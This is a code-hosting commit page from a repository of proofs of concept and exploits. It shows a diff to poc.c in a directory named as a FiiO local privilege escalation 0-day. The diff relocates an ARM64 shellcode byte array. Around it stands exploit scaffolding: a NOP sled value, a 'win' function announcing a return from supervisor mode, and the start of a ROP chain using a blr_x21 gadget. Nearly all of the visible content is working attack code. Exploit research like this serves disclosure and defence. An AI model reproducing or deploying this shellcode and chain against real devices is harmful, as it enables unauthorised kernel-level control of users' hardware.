STRLCPY/stigward_PoCs-and-Exploits

cleaned up code
stigward committed 1 year ago

f7d6010e

1 parent 78614b2c

Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)

Total 1 files

■ ■ ■ ■ ■ ■

fiio_LPE_0day/poc.c

		skipped 16 lines
17	17		uint64_t nop = 0xd503201fd503201f;
18	18		uint64_t junk = 0x4242424242424242;
19	19
	20	+	unsigned char shellcode[] = {
	21	+	0x02, 0xf9, 0x98, 0xd2, 0x42, 0x18, 0xa0, 0xf2,
	22	+	0x02, 0xf8, 0xdf, 0xf2, 0xe2, 0xff, 0xff, 0xf2,
	23	+	0xe3, 0x05, 0x80, 0x52, 0x43, 0x00, 0x00, 0x39,
	24	+	0x83, 0x0c, 0x80, 0x52, 0x43, 0x04, 0x00, 0x39,
	25	+	0x23, 0x0c, 0x80, 0x52, 0x43, 0x08, 0x00, 0x39,
	26	+	0x83, 0x0e, 0x80, 0x52, 0x43, 0x0c, 0x00, 0x39,
	27	+	0x23, 0x0c, 0x80, 0x52, 0x43, 0x10, 0x00, 0x39,
	28	+	0xe3, 0x05, 0x80, 0x52, 0x43, 0x14, 0x00, 0x39,
	29	+	0x83, 0x0d, 0x80, 0x52, 0x43, 0x18, 0x00, 0x39,
	30	+	0xe3, 0x0d, 0x80, 0x52, 0x43, 0x1c, 0x00, 0x39,
	31	+	0x63, 0x0c, 0x80, 0x52, 0x43, 0x20, 0x00, 0x39,
	32	+	0x23, 0x0c, 0x80, 0x52, 0x43, 0x24, 0x00, 0x39,
	33	+	0x83, 0x0d, 0x80, 0x52, 0x43, 0x28, 0x00, 0x39,
	34	+	0xe3, 0x05, 0x80, 0x52, 0x43, 0x2c, 0x00, 0x39,
	35	+	0x83, 0x0e, 0x80, 0x52, 0x43, 0x30, 0x00, 0x39,
	36	+	0xa3, 0x0d, 0x80, 0x52, 0x43, 0x34, 0x00, 0x39,
	37	+	0x03, 0x0e, 0x80, 0x52, 0x43, 0x38, 0x00, 0x39,
	38	+	0xe3, 0x05, 0x80, 0x52, 0x43, 0x3c, 0x00, 0x39,
	39	+	0x63, 0x0c, 0x80, 0x52, 0x43, 0x40, 0x00, 0x39,
	40	+	0xa3, 0x0d, 0x80, 0x52, 0x43, 0x44, 0x00, 0x39,
	41	+	0x83, 0x0c, 0x80, 0x52, 0x43, 0x48, 0x00, 0x39,
	42	+	0xe3, 0x03, 0x1f, 0xaa, 0x43, 0x30, 0x01, 0xf8,
	43	+	0xa2, 0x02, 0x02, 0xd1, 0x41, 0x00, 0x40, 0xf9,
	44	+	0x44, 0x04, 0x40, 0xf9, 0xe0, 0x03, 0x1f, 0xaa,
	45	+	0x04, 0x41, 0x18, 0xd5, 0x21, 0x40, 0x18, 0xd5,
	46	+	0x00, 0x40, 0x18, 0xd5, 0xe0, 0x03, 0x9f, 0xd6,
	47	+	};
	48	+
20	49		static int win() {
21	50		puts("[+] Returned from supervisor mode\n");
22	51		return 0;
23	52		}
24		-
25	53
26	54		static int exploit() {
27	55		int fd;
		skipped 10 lines
38	66		}
39	67
40	68		void stack_top = (void )((uint64_t)stack_base + stack_size);
41		-
42		-
43		-	unsigned char shellcode[] = {
44		-	0x02, 0xf9, 0x98, 0xd2, 0x42, 0x18, 0xa0, 0xf2,
45		-	0x02, 0xf8, 0xdf, 0xf2, 0xe2, 0xff, 0xff, 0xf2,
46		-	0xe3, 0x05, 0x80, 0x52, 0x43, 0x00, 0x00, 0x39,
47		-	0x83, 0x0c, 0x80, 0x52, 0x43, 0x04, 0x00, 0x39,
48		-	0x23, 0x0c, 0x80, 0x52, 0x43, 0x08, 0x00, 0x39,
49		-	0x83, 0x0e, 0x80, 0x52, 0x43, 0x0c, 0x00, 0x39,
50		-	0x23, 0x0c, 0x80, 0x52, 0x43, 0x10, 0x00, 0x39,
51		-	0xe3, 0x05, 0x80, 0x52, 0x43, 0x14, 0x00, 0x39,
52		-	0x83, 0x0d, 0x80, 0x52, 0x43, 0x18, 0x00, 0x39,
53		-	0xe3, 0x0d, 0x80, 0x52, 0x43, 0x1c, 0x00, 0x39,
54		-	0x63, 0x0c, 0x80, 0x52, 0x43, 0x20, 0x00, 0x39,
55		-	0x23, 0x0c, 0x80, 0x52, 0x43, 0x24, 0x00, 0x39,
56		-	0x83, 0x0d, 0x80, 0x52, 0x43, 0x28, 0x00, 0x39,
57		-	0xe3, 0x05, 0x80, 0x52, 0x43, 0x2c, 0x00, 0x39,
58		-	0x83, 0x0e, 0x80, 0x52, 0x43, 0x30, 0x00, 0x39,
59		-	0xa3, 0x0d, 0x80, 0x52, 0x43, 0x34, 0x00, 0x39,
60		-	0x03, 0x0e, 0x80, 0x52, 0x43, 0x38, 0x00, 0x39,
61		-	0xe3, 0x05, 0x80, 0x52, 0x43, 0x3c, 0x00, 0x39,
62		-	0x63, 0x0c, 0x80, 0x52, 0x43, 0x40, 0x00, 0x39,
63		-	0xa3, 0x0d, 0x80, 0x52, 0x43, 0x44, 0x00, 0x39,
64		-	0x83, 0x0c, 0x80, 0x52, 0x43, 0x48, 0x00, 0x39,
65		-	0xe3, 0x03, 0x1f, 0xaa, 0x43, 0x30, 0x01, 0xf8,
66		-	0xa2, 0x02, 0x02, 0xd1, 0x41, 0x00, 0x40, 0xf9,
67		-	0x44, 0x04, 0x40, 0xf9, 0xe0, 0x03, 0x1f, 0xaa,
68		-	0x04, 0x41, 0x18, 0xd5, 0x21, 0x40, 0x18, 0xd5,
69		-	0x00, 0x40, 0x18, 0xd5, 0xe0, 0x03, 0x9f, 0xd6,
70		-	};
71		-
72	69
73	70		uint64_t chain = (uint64_t )&buf[1024];
74	71		*chain++ = (uint64_t)blr_x21;
		skipped 38 lines

cleaned up code